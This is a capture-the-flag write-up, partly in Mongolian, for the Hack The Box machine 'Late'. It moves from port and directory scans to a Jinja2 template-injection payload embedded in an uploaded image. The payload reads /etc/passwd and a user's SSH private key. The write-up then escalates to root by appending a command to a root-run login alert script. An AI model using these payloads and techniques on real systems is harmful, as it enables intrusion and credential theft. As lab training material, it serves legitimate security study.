HTB - Late | CaDiL's Blog

1. IP Address

# Machine Address
10.10.11.156

# Local Address
10.10.14.44

2. Nmap & Nikto

nmap

nmap -sC -sV -oA nmap/late 10.10.11.156

Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 22:28 EDT
Nmap scan report for 10.10.11.156
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_  256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.86 seconds

Nikto

nikto -h 10.10.11.156

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.11.156
+ Target Hostname:    10.10.11.156
+ Target Port:        80
+ Start Time:         2022-07-14 22:29:34 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx/1.14.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

3. Feroxbuster & ffuf

feroxbuster -u http://late.htb -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.3.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://late.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.3.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301        7l       13w      194c http://late.htb/assets
301        7l       13w      194c http://late.htb/assets/css
301        7l       13w      194c http://late.htb/assets/images
301        7l       13w      194c http://late.htb/assets/js
301        7l       13w      194c http://late.htb/assets/fonts
[####################] - 2m    179994/179994  0s      found:5       errors:0      
[####################] - 2m     29999/29999   204/s   http://late.htb
[####################] - 2m     29999/29999   205/s   http://late.htb/assets
[####################] - 2m     29999/29999   205/s   http://late.htb/assets/css
[####################] - 2m     29999/29999   205/s   http://late.htb/assets/images
[####################] - 2m     29999/29999   205/s   http://late.htb/assets/js
[####################] - 2m     29999/29999   205/s   http://late.htb/assets/fonts

ffuf

ffuf -c -u http://late.htb/ -H "Host: FUZZ.devzat.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -fs 9461

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://late.htb/
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.late.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response size: 9461
________________________________________________

images                  [Status: 200, Size: 2187, Words: 448, Lines: 64]
:: Progress: [4989/4989] :: Job [1/1] :: 169 req/sec :: Duration: [0:00:30] :: Errors: 0 ::

4. Burp

POST /scanner HTTP/1.1
Host: images.late.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------260872003713748502303208156715
Content-Length: 33052
Origin: http://images.late.htb
DNT: 1
Connection: close
Referer: http://images.late.htb/
Upgrade-Insecure-Requests: 1

-----------------------------260872003713748502303208156715
Content-Disposition: form-data; name="file"; filename="Screenshot_2022-07-15 Image Reader.png"
Content-Type: image/png

PNG


-----------------------------260872003713748502303208156715--

https://cloudconvert.com/txt-to-jpg - ашиглаад passwd -г txt болгон гаргаж авбал:


{{(''.__class__).__mro__[1].__subclasses__()[249]("cat /etc/passwd", stdout=-1, shell=True).communicate() }}

txt-г jpg хөрвүүлэлт хийгээд upload хийвэл: result.txt

<p>(b&#39;root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin\nsyslog:x:102:106::/home/syslog:/usr/sbin/nologin\nmessagebus:x:103:107::/nonexistent:/usr/sbin/nologin\n_apt:x:104:65534::/nonexistent:/usr/sbin/nologin\nlxd:x:105:65534::/var/lib/lxd/:/bin/false\nuuidd:x:106:110::/run/uuidd:/usr/sbin/nologin\ndnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin\nlandscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin\npollinate:x:109:1::/var/cache/pollinate:/bin/false\nsshd:x:110:65534::/run/sshd:/usr/sbin/nologin\nsvc_acc:x:1000:1000:Service Account:/home/svc_acc:/bin/bash\nrtkit:x:111:114:RealtimeKit,,,:/proc:/usr/sbin/nologin\nusbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin\navahi:x:113:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin\ncups-pk-helper:x:114:117:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin\nsaned:x:115:119::/var/lib/saned:/usr/sbin/nologin\ncolord:x:116:120:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin\npulse:x:117:121:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin\ngeoclue:x:118:123::/var/lib/geoclue:/usr/sbin/nologin\nsmmta:x:119:124:Mail Transfer Agent,,,:/var/lib/sendmail:/usr/sbin/nologin\nsmmsp:x:120:125:Mail Submission Program,,,:/var/lib/sendmail:/usr/sbin/nologin\n&#39;, None)
</p>%

svc_acc:x:1000:1000:Service Account:/home/svc_acc:/bin/bash

svc_acc - ssh авах

{{(''.__class__).__mro__[1].__subclasses__()[249]("cat ~/.ssh/id_rsa", stdout=-1, shell=True).communicate() }}

id_rsa

-----BEGIN RSA PRIVATE KEY-----
MIIEp*****************
-----END RSA PRIVATE KEY-----

user.txt

550e06****************

5. Privilege escalation

pspy уншуулаад харвал:

svc_acc@late:/usr/local/sbin$ cat ssh-alert.sh 
#!/bin/bash

RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"

BODY="
A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`
"

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi

lsattr a - echo ашиглаад энэ файл руу утга оруулж болно.

svc_acc@late:/usr/local/sbin$ lsattr ssh-alert.sh 
-----a--------e--- ssh-alert.sh

tmp дотор txt үүсгээд:

cat /root/root.txt >> /home/svc_acc/flag.txt

ssh-alert руу append хийнэ:

cat /tmp/haha.txt >> /usr/local/sbin/ssh-alert.sh

ssh-alert.sh-г trigger хийж ажилуулахын тулд svc_acc -s гараад эргээд id_rsa-р орно. Тэгээд flag.txt дотор root.txt байгаа.

root.txt

63195a4*********

1. IP Address#

2. Nmap & Nikto#

3. Feroxbuster & ffuf#

4. Burp#

5. Privilege escalation#

1. IP Address

2. Nmap & Nikto

3. Feroxbuster & ffuf

4. Burp

5. Privilege escalation